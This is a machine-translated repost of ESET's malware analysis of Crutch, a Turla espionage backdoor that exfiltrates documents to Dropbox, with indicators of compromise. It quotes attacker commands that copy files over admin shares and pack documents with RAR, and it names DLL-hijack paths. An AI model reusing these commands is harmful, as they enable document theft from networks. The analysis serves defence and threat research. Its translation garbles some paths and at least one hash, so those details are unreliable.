Shulou(Shulou.com)05/31 Report--

Editor to share with you what kind of software Crutch is, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Words written in the front

According to the latest report from ESET, ESET researchers recently discovered a previously undocumented backdoor and file theft malware. The developers of the malware named it Crutch and have now linked it to the infamous Turla APT organization. In a series of cyber espionage activities between 2015 and early 2020, the Russian hacker group Turla used the previously undiscovered malware framework to attack various government agencies. It is understood that the Crutch malware used by the Russian hacker organization Turla can help network attackers collect and extract leaked sensitive files.

We have made an in-depth analysis of the Russian hacker organization Turla and the Crutch malware framework they use, and the attack complexity of Turla and related technical details are sufficient to prove that the Russian hacker organization Turla absolutely has a lot of resources to operate and maintain such a large and diversified network attack arsenal.

Crutch belongs to the Russian hacker organization Turla.

ESET's security research experts were able to link Crutch malware to the Russian hacker group Turla (APT) based on the backdoor features used by the hacker group between 2016 and 2017. At that time, the second phase backdoor used by the hacker group was Gazer (SHA-1 1AE4775EFF21FB59708E8C2B55967CD24840C8D9), also known as WhiteBear, and it was highly similar to Crutch malware (SHA-1 A010D5449D29A1916827FDB443E3C84C*405CB2A5) in some ways:

The storage path of the malicious files of these two samples on the target device is "C:\ Intel\ ~ intel_upd.exe"

Both samples will be dropped into CAB files containing various malware components

The PBD paths of the two malware loaders are also highly correlated: C:\ Users\ user\ Documents\ Visual Studio 2012\ Projects\ MemoryStarter\ Release\ Extractor.pdb and C:\ Users\ user\ Documents\ Visual Studio 2012\ Projects\ MemoryStarter\ x64\ Release\ Extractor.pdb

The loader uses the same RC*4 key when decrypting Payload: E8 8E 77 7E C7 808E E7 CE CE CE C6 C6 CE C6 68

In view of these factors and the similarity between the two, and it has not been found that the Turla malware family has ever shared code with other cyber criminal organizations, we have reason to think that Crutch malware is part of the Turla cyber attack arsenal.

Another interesting thing is that the researchers found both FatDuke and Crutch on the same infected host. The former is the third phase backdoor used by Dukes/APT29, but there is no evidence of any correlation between the two malware families.

Cyber espionage

According to ESET LiveGrid ®, Turla used Crutch to carry out attacks on several machines of a foreign ministry in the European Union, while Crutch can help network attackers collect and extract sensitive leaked files and store these collected files in their Dropbox account for later use.

During the analysis, we captured several control commands sent by the attacker to several Crutch v3 instances, which can help us better understand the purpose of the attacker, which involves a great deal of network reconnaissance, horizontal penetration, and network espionage.

The main activity of the malware is the staging, compression, and filtering of documents and various files, as shown in the following code:

Copy / y\\ C$\ users\\ prog\ csrftokens.txt c:\ programdata\ & dir / x c:\ programdata\ copy / y\ c $\ users\ user\ FWD___~1.ZIP% temp%\ copy / y\\ c$\ docume~1\ User\ My Documents\ Downloads\ 8937.pdf% temp% "C:\ Program Files\ WinRAR\ Rar.exe" a-hp-ri10-r-u-m2-v30m "% temp%\ ~ res.dat"d: \\ *. "" d:\ $RECYCLE.BIN\ * .doc * "" d:\ $RECYCLE.BIN\ * .pdf * "" d:\ $RECYCLE.BIN\ * .xls * "" d:\ Recycled\ * .doc * "" d:\ Recycled\ * .pdf * "" d:\\ * .pdf "

These commands are executed manually by the attacker, so it does not show how the drive monitor component automatically collects documents. File extraction is performed by the backdoor command, which is described in a later section.

Finally, the attacker will execute the following command at some point:

Working time of the mkdir% temp%\ Illbeback attacker

In order to understand the working time of Turla, we analyzed the time it uploaded to the ZIP file of Dropbox. These ZIP files contain backdoor control commands and are asynchronously uploaded to Dropbox by an attacker when their contents are read and executed from the backdoor. We collected 506 different timestamps, ranging from October 2018 to July 2019. It is shown in the following figure:

Thus it can be seen that their working hours are the same as those in the Russian UTC + 3 time zone.

Intrusion / malware spread

As early as 2017, the Russian hacker organization Turla chose to use Skipper to attack the target host in the first stage of the attack, and then in the second stage, they used Crutch malware as the second stage backdoor. But in some cases, the Russian hacker group Turla also uses the open source PowerShell Empire post-penetration framework to carry out attacks.

Crutch was an earlier version between 2015 and mid-2019, when Crutch used a backdoor communication channel to communicate with hard-coded Dropbox accounts through Dropbox's official HTTP API interface, and used drive monitoring tools that did not have network communication capabilities to store, search, extract and encrypt sensitive files.

The following is the implementation architecture of Crutch v3 malware:

After that, the developers of Crutch used a newer version (marked "version 4" by ESET). In this version, Crutch adds a removable drive monitor with network communication capabilities and removes the backdoor function.

However, because this new version of Crutch can use the Windows version of the Wget utility to automatically upload sensitive files collected on local and removable drives to Dropbox network storage, that is, this version of Crutch implements a simpler method of collecting sensitive files.

The following is the implementation architecture of Crutch v4 malware:

The working directory of Crutch v4 is C:\ Intel, which contains the following components:

Dll:Crutch DLL

Exe: legitimate Microsoft Outlook program (SHA-1: 31D82C554ABAB3DD8917D058C2A46509272668C3)

Dat:Crutch configuration file that contains Dropbox API tokens

Exe:RAR tool (SHA-1: A92C801F491485F6E27B7EF6E52E02B461DBCFAA)

Exe:Windows version of Wget tool (SHA-1: 457B1CD985ED07BAFFD8C66FF40E9C1B6DA93753)

Like Crutch v3, Crutch v4 uses DLL hijacking technology to achieve persistent infection on infected devices with Chrome, Firefox, or OneDrive installed, where Cruch version 4 infects the target host as "an old Microsoft Outlook component."

Intrusion threat indicator IoC hash:

SHA-1

Description

ESET detection name

A010D5449D29A1916827FDB443E3C84C*405CB2A5

Crutch dropper is similar to Gazer.

Win64/Agent.VX

2FABCF0FCE7F733F45E73B432F413E564B92D651

Crutch v3 back door

Win32/Agent.TQL

A4AFF23B9A58B598524A71F09AA67994083A9C83

Crutch v3 back door

Win32/Agent.TQL

778AA3A58F5C76E537B5FE287912CC53469A6078

Crutch v4

Win32/Agent.SVE

Path: C:\ Intel\ C:\ AMD\ Temp\ filename: C:\ Intel\ outllib.dllC:\ Intel\ lang.nlsC:\ Intel\ ~ intel_upd.exeC:\ Intel\ ~ csrss.exeC:\ Program Files (x86)\ Google\ Application\ dwmapi.dllC:\ Program Files (x86)\ Mozilla Firefox\ rasadhlp.dll%LOCALAPPDATA%\ Microsoft\ OneDrive\ dwmapi.dll Network: hotspot.accesscam [.] orghighcolumn.webredirect [.] orgethdns.mywire [.] orgtheguardian.webredirect [.] orghttps : / / raw.githubusercontent [.] com/ksRD18pro/ksRD18/master/ntk.tmp is all the content of the article "what is Crutch?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.